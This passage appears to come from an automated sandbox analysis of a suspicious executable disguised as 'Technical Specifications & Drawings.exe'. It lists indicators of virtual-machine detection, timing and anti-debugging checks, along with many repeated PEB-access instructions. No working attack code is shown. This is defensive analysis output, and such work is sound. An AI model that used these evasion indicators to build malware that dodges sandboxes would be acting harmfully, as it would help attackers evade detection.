          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000005.00000000.306843353.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
          Source: explorer.exe, 00000005.00000000.309044837.0000000008476000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: lume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.320624186.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: explorer.exe, 00000005.00000000.320680950.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
          Source: explorer.exe, 00000005.00000000.327010240.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
          Source: explorer.exe, 00000005.00000000.323194447.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: explorer.exe, 00000005.00000000.330711449.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000005.00000000.306843353.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01875BA5 rdtsc
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018269A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018341E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01823884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01823884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01874015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01874015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01827016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01827016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01827016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01871074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0185D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017ADB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01875BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017ADB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018523E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018523E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018523E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01878B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A5210 mov eax, dword ptr fs:[00000030h]
